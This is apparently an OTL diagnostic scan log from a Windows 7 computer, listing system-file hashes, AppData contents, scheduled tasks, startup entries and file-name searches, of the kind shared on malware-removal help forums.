[2014.06.20 08:43:36 | 000,000,948 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cf8c5b584a0b82.job

< >

< MD5 for: ATAPI.SYS >
[2009.07.14 02:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\SysNative\drivers\atapi.sys
[2009.07.14 02:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\SysNative\DriverStore\FileRepository\mshdc.inf_amd64_neutral_a69a58a4286f0b22\atapi.sys
[2009.07.14 02:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7600.16385_none_392d19c13b3ad543\atapi.sys

< MD5 for: AUTOCHK.EXE >
[2009.07.14 02:14:12 | 000,668,160 | ---- | M] (Microsoft Corporation) MD5=41E4C8EBA464E7D6A5BA5E8827732AEB -- C:\Windows\SysWOW64\autochk.exe
[2009.07.14 02:14:12 | 000,668,160 | ---- | M] (Microsoft Corporation) MD5=41E4C8EBA464E7D6A5BA5E8827732AEB -- C:\Windows\winsxs\x86_microsoft-windows-autochk_31bf3856ad364e35_6.1.7600.16385_none_e1ca436d2314b860\autochk.exe
[2009.07.14 02:38:56 | 000,777,728 | ---- | M] (Microsoft Corporation) MD5=8B7F8E882A649D81CEA1EDE9BBB68FFF -- C:\Windows\SysNative\autochk.exe
[2009.07.14 02:38:56 | 000,777,728 | ---- | M] (Microsoft Corporation) MD5=8B7F8E882A649D81CEA1EDE9BBB68FFF -- C:\Windows\winsxs\amd64_microsoft-windows-autochk_31bf3856ad364e35_6.1.7600.16385_none_3de8def0db722996\autochk.exe

< MD5 for: CDROM.SYS >
[2009.07.14 00:19:54 | 000,147,456 | ---- | M] (Microsoft Corporation) MD5=83D2D75E1EFB81B3450C18131443F7DB -- C:\Windows\SysNative\drivers\cdrom.sys
[2009.07.14 00:19:54 | 000,147,456 | ---- | M] (Microsoft Corporation) MD5=83D2D75E1EFB81B3450C18131443F7DB -- C:\Windows\SysNative\DriverStore\FileRepository\cdrom.inf_amd64_neutral_8363d00ecae4322d\cdrom.sys
[2009.07.14 00:19:54 | 000,147,456 | ---- | M] (Microsoft Corporation) MD5=83D2D75E1EFB81B3450C18131443F7DB -- C:\Windows\winsxs\amd64_cdrom.inf_31bf3856ad364e35_6.1.7600.16385_none_bb9e4d89bd7870f1\cdrom.sys

< MD5 for: EXPLORER.EXE >
[2009.07.14 02:14:20 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=15BC38A7492BEFE831966ADB477CF76F -- C:\Windows\SysWOW64\explorer.exe
[2009.07.14 02:14:20 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=15BC38A7492BEFE831966ADB477CF76F -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16385_none_b7fe430bc7ce3761\explorer.exe
[2009.10.31 06:45:39 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=2626FC9755BE22F805D3CFA0CE3EE727 -- C:\Windows\SoftwareDistribution\Download\0cfc8dbf763c806fb82e646c7352a6fc\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16450_none_b819b343c7ba6202\explorer.exe
[2009.10.31 07:34:59 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=9AAAEC8DAC27AA17B053E6352AD233AE -- C:\Windows\SoftwareDistribution\Download\0cfc8dbf763c806fb82e646c7352a6fc\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16450_none_adc508f19359a007\explorer.exe
[2009.10.31 07:38:38 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=B8EC4BD49CE8F6FC457721BFC210B67F -- C:\Windows\SoftwareDistribution\Download\0cfc8dbf763c806fb82e646c7352a6fc\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20563_none_ae46d6aeac7ca7c7\explorer.exe
[2009.07.14 02:39:10 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=C235A51CB740E45FFA0EBFB9BAFCDA64 -- C:\Windows\explorer.exe
[2009.07.14 02:39:10 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=C235A51CB740E45FFA0EBFB9BAFCDA64 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16385_none_ada998b9936d7566\explorer.exe
[2009.10.31 07:00:51 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=C76153C7ECA00FA852BB0C193378F917 -- C:\Windows\SoftwareDistribution\Download\0cfc8dbf763c806fb82e646c7352a6fc\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20563_none_b89b8100e0dd69c2\explorer.exe

< MD5 for: HAL.DLL >
[2009.07.14 02:47:48 | 000,263,232 | ---- | M] (Microsoft Corporation) MD5=C0A6F6E05E14FBCAEDE7796C8590B7AC -- C:\Windows\SysNative\hal.dll
[2009.07.14 02:47:48 | 000,263,232 | ---- | M] (Microsoft Corporation) MD5=C0A6F6E05E14FBCAEDE7796C8590B7AC -- C:\Windows\winsxs\amd64_microsoft-windows-hal_31bf3856ad364e35_6.1.7600.16385_none_071de44b735b3dfc\hal.dll

< MD5 for: SCECLI.DLL >
[2009.07.14 02:16:13 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=26073302DAEA83CC5B944C546D6B47D2 -- C:\Windows\SysWOW64\scecli.dll
[2009.07.14 02:16:13 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=26073302DAEA83CC5B944C546D6B47D2 -- C:\Windows\winsxs\wow64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7600.16385_none_9e577e55272d37b4\scecli.dll
[2009.07.14 02:41:53 | 000,232,448 | ---- | M] (Microsoft Corporation) MD5=398712DDDAEFB85EDF61DF6A07B65C79 -- C:\Windows\SysNative\scecli.dll
[2009.07.14 02:41:53 | 000,232,448 | ---- | M] (Microsoft Corporation) MD5=398712DDDAEFB85EDF61DF6A07B65C79 -- C:\Windows\winsxs\amd64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7600.16385_none_9402d402f2cc75b9\scecli.dll

< MD5 for: SERVICES.EXE >
[2009.07.14 02:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\SysNative\services.exe
[2009.07.14 02:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.exe

< MD5 for: SVCHOST.EXE >
[2009.07.14 02:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\SysWOW64\svchost.exe
[2009.07.14 02:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_b591afc466a15356\svchost.exe
[2014.11.21 06:12:42 | 000,761,656 | ---- | M] (MalwareBytes) MD5=625BB08813743947985B0DEEFC35ED12 -- C:\Program Files (x86)\Malwarebytes Anti-Malware\Chameleon\Windows\svchost.exe
[2009.07.14 02:39:46 | 000,027,136 | ---- | M] (Microsoft Corporation) MD5=C78655BC80301D76ED4FEF1C1EA40A7D -- C:\Windows\SysNative\svchost.exe
[2009.07.14 02:39:46 | 000,027,136 | ---- | M] (Microsoft Corporation) MD5=C78655BC80301D76ED4FEF1C1EA40A7D -- C:\Windows\winsxs\amd64_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_11b04b481efec48c\svchost.exe

< MD5 for: TCPIP.SYS >
[2010.04.09 12:06:28 | 001,898,376 | ---- | M] (Microsoft Corporation) MD5=7FC877A25796D8ADF539E64703FCA7E1 -- C:\Windows\SysNative\drivers\tcpip.sys
[2010.04.09 12:06:28 | 001,898,376 | ---- | M] (Microsoft Corporation) MD5=7FC877A25796D8ADF539E64703FCA7E1 -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7600.16569_none_0f2ca8c580036f65\tcpip.sys
[2009.07.14 02:45:55 | 001,898,576 | ---- | M] (Microsoft Corporation) MD5=912107716BAB424C7870E8E6AF5E07E1 -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7600.16385_none_0f1303f98017479d\tcpip.sys
[2010.04.09 08:56:29 | 001,892,232 | ---- | M] (Microsoft Corporation) MD5=A9C0F786AC1F736891D05CE0A1D29DEB -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7600.20687_none_0f9ea52499331463\tcpip.sys

< MD5 for: USERINIT.EXE >
[2009.07.14 02:14:43 | 000,026,112 | ---- | M] (Microsoft Corporation) MD5=6DE80F60D7DE9CE6B8C2DDFDF79EF175 -- C:\Windows\SysWOW64\userinit.exe
[2009.07.14 02:14:43 | 000,026,112 | ---- | M] (Microsoft Corporation) MD5=6DE80F60D7DE9CE6B8C2DDFDF79EF175 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.1.7600.16385_none_dbff103933038d7c\userinit.exe
[2009.07.14 02:39:48 | 000,030,208 | ---- | M] (Microsoft Corporation) MD5=6F8F1376A13114CC10C0E69274F5A4DE -- C:\Windows\SysNative\userinit.exe
[2009.07.14 02:39:48 | 000,030,208 | ---- | M] (Microsoft Corporation) MD5=6F8F1376A13114CC10C0E69274F5A4DE -- C:\Windows\winsxs\amd64_microsoft-windows-userinit_31bf3856ad364e35_6.1.7600.16385_none_381dabbceb60feb2\userinit.exe

< MD5 for: WINLOGON.EXE >
[2009.07.14 02:39:52 | 000,389,120 | ---- | M] (Microsoft Corporation) MD5=132328DF455B0028F13BF0ABEE51A63A -- C:\Windows\SysNative\winlogon.exe
[2009.07.14 02:39:52 | 000,389,120 | ---- | M] (Microsoft Corporation) MD5=132328DF455B0028F13BF0ABEE51A63A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16385_none_cbb7f2bdeea2829c\winlogon.exe
[2014.11.21 06:12:42 | 000,761,656 | ---- | M] (MalwareBytes) MD5=625BB08813743947985B0DEEFC35ED12 -- C:\Program Files (x86)\Malwarebytes Anti-Malware\Chameleon\Windows\winlogon.exe
[2009.10.28 08:01:57 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=A93D41A4D4B0D91C072D11DD8AF266DE -- C:\Windows\SoftwareDistribution\Download\0cfc8dbf763c806fb82e646c7352a6fc\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.20560_none_cc522fd507b468f8\winlogon.exe
[2009.10.28 07:24:40 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=DA3E2A6FA9660CC75B471530CE88453A -- C:\Windows\SoftwareDistribution\Download\0cfc8dbf763c806fb82e646c7352a6fc\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16447_none_cbe534e7ee8042ad\winlogon.exe

< >

< %systemroot%*.* /U /s >
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
[1 C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\*.tmp files -> C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\*.tmp -> ]
[2 C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\*.tmp files -> C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\*.tmp -> ]
[1 C:\Windows\Installer\*.tmp files -> C:\Windows\Installer\*.tmp -> ]
[52 C:\Windows\Temp\*.tmp files -> C:\Windows\Temp\*.tmp -> ]

< %SYSTEMDRIVE%\*.exe >

< %ALLUSERSPROFILE%\Application Data\*. >

< %ALLUSERSPROFILE%\Application Data\*.exe /s >

< %APPDATA%\*. >
[2013.04.26 18:27:28 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Adobe
[2013.11.04 10:40:41 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Apple Computer
[2014.10.22 17:33:04 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Audacity
[2014.04.02 10:28:32 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\AVG
[2014.10.16 09:31:26 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\AVS4YOU
[2014.01.17 13:39:39 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Battle.net
[2013.04.27 18:06:13 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\BSplayer
[2013.04.19 15:00:12 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\BSplayer Pro
[2014.12.06 10:37:14 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD
[2013.04.26 10:04:43 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\DAEMON Tools Lite
[2014.04.02 10:27:50 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\DVDVideoSoft
[2014.11.10 22:52:18 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\e-academy Inc
[2013.04.23 15:44:47 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\ESET
[2014.01.13 19:38:22 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\GetRight
[2014.10.06 10:22:09 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\GHISLER
[2014.09.23 09:18:11 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\gtk-2.0
[2013.04.20 15:18:20 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\HpUpdate
[2013.04.19 14:14:12 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Identities
[2014.11.03 20:02:03 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\IK Multimedia
[2013.04.19 14:58:08 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Macromedia
[2013.05.02 09:57:07 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\MathWorks
[2013.04.19 20:59:10 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Media Player Classic
[2014.11.20 09:50:49 | 000,000,000 | --SD | M] -- C:\Users\Lobo\AppData\Roaming\Microsoft
[2013.04.19 14:50:49 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Mozilla
[2014.06.22 11:08:43 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\NVIDIA
[2014.05.15 17:04:37 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\PDF Architect
[2014.05.15 17:02:19 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\pdfforge
[2014.02.21 11:50:35 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\PSpad
[2014.06.22 11:08:40 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Publish Providers
[2013.04.19 15:05:20 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\QIP
[2014.11.03 20:23:51 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\REAPER
[2013.07.05 22:29:22 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Riot Games
[2013.05.25 22:13:14 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Shifters Anticheat
[2014.09.29 20:01:07 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Skype
[2013.06.17 20:23:56 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Softland
[2014.07.01 10:52:51 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Sony
[2014.06.24 16:05:17 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Sublime Text 3
[2014.11.26 22:35:10 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\TS3Client
[2014.01.13 19:34:53 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Unity
[2013.06.28 11:03:20 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\VitySoft
[2013.04.26 14:26:43 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\WinRAR

< %APPDATA%\*.exe /s >
[2014.03.06 16:01:54 | 000,207,368 | ---- | M] (Check Point Software Technologies LTD) -- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD\zonealarm\1.8.29.17\uninstall.exe
[2014.12.08 23:26:22 | 000,200,824 | ---- | M] (Check Point Software Technologies LTD) -- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD\zonealarm\1.8.29.17\uninstall_d.exe
[2014.03.06 13:18:22 | 000,729,384 | ---- | M] (Check Point Software Technologies LTD) -- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD\zonealarm\1.8.29.17\zonealarm4ffx.exe
[2014.11.10 22:52:18 | 000,009,662 | R--- | M] () -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E040B65B-8683-4228-8C33-D44A141E40EA}\_112D608FD02CD87FDC7735.exe
[2014.11.10 22:52:18 | 000,009,662 | R--- | M] () -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E040B65B-8683-4228-8C33-D44A141E40EA}\_80D807FC3A72E5B428F1ED.exe
[2014.11.10 22:52:18 | 000,009,662 | R--- | M] () -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E040B65B-8683-4228-8C33-D44A141E40EA}\_853F67D554F05449430E7E.exe
[2014.07.01 08:58:05 | 000,010,134 | R--- | M] () -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E8870D92-54F6-4AC7-82D0-7DCDFB1F00AE}\ARPPRODUCTICON.exe
[2014.07.01 08:58:05 | 000,003,262 | R--- | M] () -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E8870D92-54F6-4AC7-82D0-7DCDFB1F00AE}\hl.exe1_E8870D9254F64AC782D07DCDFB1F00AE.exe
[2014.07.01 08:58:05 | 000,003,262 | R--- | M] () -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E8870D92-54F6-4AC7-82D0-7DCDFB1F00AE}\hl.exe_E8870D9254F64AC782D07DCDFB1F00AE.exe
[2014.07.01 08:58:05 | 000,040,960 | R--- | M] (InstallShield Software Corp.) -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E8870D92-54F6-4AC7-82D0-7DCDFB1F00AE}\hlds.exe_E8870D9254F64AC782D07DCDFB1F00AE.exe
[2014.07.01 08:58:05 | 000,040,960 | R--- | M] (InstallShield Software Corp.) -- C:\Users\Lobo\AppData\Roaming\Microsoft\Installer\{E8870D92-54F6-4AC7-82D0-7DCDFB1F00AE}\hltv.exe_E8870D9254F64AC782D07DCDFB1F00AE.exe
[2013.05.03 18:01:50 | 000,031,232 | ---- | M] () -- C:\Users\Lobo\AppData\Roaming\QIP\Profiles\196726440@qip.ru\RcvdFiles\Honza_18__204630063\1\1\jedna\Debug\jedna.exe

< %systemroot%\*. /mp /s >

< %systemroot%\system32\*.dll /lockedfiles >

< %systemroot%\Tasks\*.job >
[2014.12.09 17:14:02 | 000,000,914 | ---- | M] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job
[2014.12.09 13:42:07 | 000,000,948 | ---- | M] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cf8c5b584a0b82.job
[2014.12.09 17:48:00 | 000,000,952 | ---- | M] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cf6ab1eb08fd0f.job

< %systemroot%\system32\drivers\*.sys /lockedfiles >

< %systemroot%\System32\config\*.sav >

< %systemroot%\system32\*.dll /lockedfiles >

< %systemroot%\system32\drivers\*.sys /3 >

< %systemroot%\system32\*.* /3 >
[2014.12.07 21:13:55 | 001,765,988 | ---- | M] () -- C:\Windows\system32\PerfStringBackup.INI

< %SYSTEMDRIVE%\*.exe >

< >

< HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s >
"Sidebar" = C:\Program Files\Windows Sidebar\sidebar.exe /autoRun -- [2009.07.14 02:39:41 | 001,475,072 | ---- | M] (Microsoft Corporation)
"DAEMON Tools Lite" = "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun -- [2013.03.14 09:23:30 | 003,672,640 | ---- | M] (Disc Soft Ltd)
"GoogleDriveSync" = "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart -- [2014.08.08 09:34:04 | 022,734,160 | ---- | M] (Google)

< >

< %PROGRAMFILES%\Mozilla Firefox\firefox.exe /md5 >
[2014.11.11 00:49:31 | 000,275,568 | ---- | M] (Mozilla Corporation) MD5=65068E245EFE045E6956190CD0E2FB91 -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe

< %PROGRAMFILES%\Internet Explorer\iexplore.exe /md5 >
[2009.07.14 02:17:29 | 000,673,048 | ---- | M] (Microsoft Corporation) MD5=2C32E3E596CFE660353753EABEFB0540 -- C:\Program Files (x86)\Internet Explorer\iexplore.exe

< %PROGRAMFILES%\Opera\opera.exe /md5 >

< %PROGRAMFILES%\Google\Chrome\Application\chrome.exe /md5 >
[2014.08.07 04:20:57 | 000,860,488 | ---- | M] (Google Inc.) MD5=0BDAE865738D27A4D84D50591C8C9D2D -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

< >

< %SystemDrive%\PhysicalMBR.bin /md5 >
[2014.12.09 17:36:27 | 000,000,512 | ---- | M] () MD5=528F8822153B058CF471ABD9A7E1C8AF -- C:\PhysicalMBR.bin

< >

< *crack* /s >
[2010.10.04 21:50:56 | 000,062,238 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\share\gimp\2.0\patterns\cracked.pat
[2010.10.08 11:10:04 | 000,000,254 | ---- | M] () -- \Program Files\MATLAB\R2011b\resources\pde\en\crackg.xml
[2001.02.09 12:03:10 | 000,000,483 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\pde\crackb.m
[2010.10.08 12:14:22 | 000,002,865 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\pde\crackg.m
[2005.03.07 12:35:58 | 000,000,091 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\pde\ja\crackb.m
[2005.03.07 12:35:58 | 000,000,582 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\pde\ja\crackg.m
[2013.06.28 11:03:22 | 000,005,369 | ---- | M] () -- \Users\Lobo\AppData\Roaming\VitySoft\FRD\plugins\crackle.frp

< *keygen* /s >
[2011.07.26 18:39:12 | 000,000,719 | ---- | M] () -- \Program Files\MATLAB\R2011b\toolbox\compiler\mcr\matlab\hmi\hmi\+hmi\+utils\UniqueGuiKeyGenerator.m

< *loader* /s >
[2008.02.25 07:05:22 | 000,856,064 | ---- | M] () -- \KMPlayer\ImLoader.dll
[2013.04.21 21:44:16 | 000,008,827 | ---- | M] () -- \Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit.resources\inspector\HeapSnapshotLoader.js
[2013.05.30 12:48:02 | 004,372,840 | ---- | M] () -- \Program Files (x86)\Common Files\AVSMedia\MobileUploader\AVSMobileUploader.exe
[2013.05.30 12:44:14 | 000,095,971 | ---- | M] () -- \Program Files (x86)\Common Files\AVSMedia\MobileUploader\AVSMobileUploader.sil
[2013.07.09 17:08:34 | 004,496,744 | ---- | M] () -- \Program Files (x86)\Common Files\AVSMedia\VideoUploader\AVSVideoUploader.exe
[2013.05.29 16:34:00 | 000,046,165 | ---- | M] () -- \Program Files (x86)\Common Files\AVSMedia\VideoUploader\AVSVideoUploader.sil
[2013.04.30 12:10:02 | 000,000,194 | ---- | M] () -- \Program Files (x86)\Common Files\Blizzard Entertainment\BlizzardDownloader.ini
[2012.07.26 19:08:06 | 000,102,864 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VS7Debug\coloader80.dll
[2012.07.26 13:20:02 | 000,004,096 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VS7Debug\coloader80.tlb
[2007.10.12 07:19:58 | 000,052,232 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VSTO\8.0\AddinLoader.dll
[2007.10.12 07:20:18 | 000,129,024 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VSTO\8.0\VSTOLoader.dll
[2007.10.12 07:20:14 | 000,017,416 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VSTO\8.0\1033\VSTOLoaderUI.dll
[2007.11.07 10:40:30 | 000,205,312 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VSTO\9.0\VSTOLoader.dll
[2007.11.07 10:40:30 | 000,018,952 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VSTO\9.0\1033\VSTOLoaderUI.dll
[2014.05.27 15:15:42 | 000,597,278 | ---- | M] () -- \Program Files (x86)\Comodo\Dragon\extensions\media_downloader.crx
[2010.02.07 21:40:00 | 000,000,543 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\etc\gtk-2.0\gdk-pixbuf.loaders
[2009.12.15 17:58:18 | 000,017,056 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-ani.dll
[2009.12.15 17:58:20 | 000,018,592 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-bmp.dll
[2009.12.15 17:58:24 | 000,026,272 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-gif.dll
[2009.12.15 17:58:26 | 000,012,960 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-icns.dll
[2009.12.15 17:58:28 | 000,017,568 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-ico.dll
[2009.12.15 17:58:56 | 000,019,616 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-jpeg.dll
[2009.12.15 17:59:04 | 000,015,008 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-pcx.dll
[2009.12.15 17:59:06 | 000,019,104 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-png.dll
[2009.12.15 17:59:10 | 000,017,056 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-pnm.dll
[2009.12.15 17:59:14 | 000,012,448 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-ras.dll
[2009.12.15 17:59:16 | 000,016,544 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-tga.dll
[2009.12.15 17:59:20 | 000,016,544 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-tiff.dll
[2009.12.15 17:59:22 | 000,011,936 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-wbmp.dll
[2009.12.15 17:59:24 | 000,013,984 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-xbm.dll
[2009.12.15 17:59:28 | 000,028,320 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\libpixbufloader-xpm.dll
[2009.05.01 19:42:00 | 000,009,880 | ---- | M] () -- \Program Files (x86)\GIMP-2.0\lib\gtk-2.0\2.10.0\loaders\svg_loader.dll
[2009.10.06 04:08:30 | 000,145,082 | ---- | M] () -- \Program Files (x86)\HP\HP Deskjet 2050 J510 series\bin\HelpViewer\Resources\Loader.gif
[2014.06.11 10:08:18 | 000,412,736 | ---- | M] () -- \Program Files (x86)\CheckPoint\ZoneAlarm\avsys\kas_loader.dll
[2014.06.11 10:08:34 | 000,368,704 | ---- | M] () -- \Program Files (x86)\CheckPoint\ZoneAlarm\avsys\prloader.dll
[2005.10.14 01:49:48 | 000,017,624 | ---- | M] () -- \Program Files (x86)\Microsoft SQL Server\90\Tools\Binn\SqlResourceLoader.dll
[2005.10.14 01:49:48 | 000,017,624 | ---- | M] () -- \Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\SqlResourceLoader.dll
[2012.11.01 08:32:14 | 000,057,224 | ---- | M] () -- \Program Files (x86)\NVIDIA Corporation\PhysX\Common\PhysXLoader.dll
[2012.11.01 08:32:44 | 000,065,416 | ---- | M] () -- \Program Files (x86)\NVIDIA Corporation\PhysX\Common\PhysXLoader64.dll
[2012.09.04 22:34:12 | 000,083,848 | ---- | M] () -- \Program Files (x86)\NVIDIA Corporation\PhysX\Common\PhysXUpdateLoader.dll
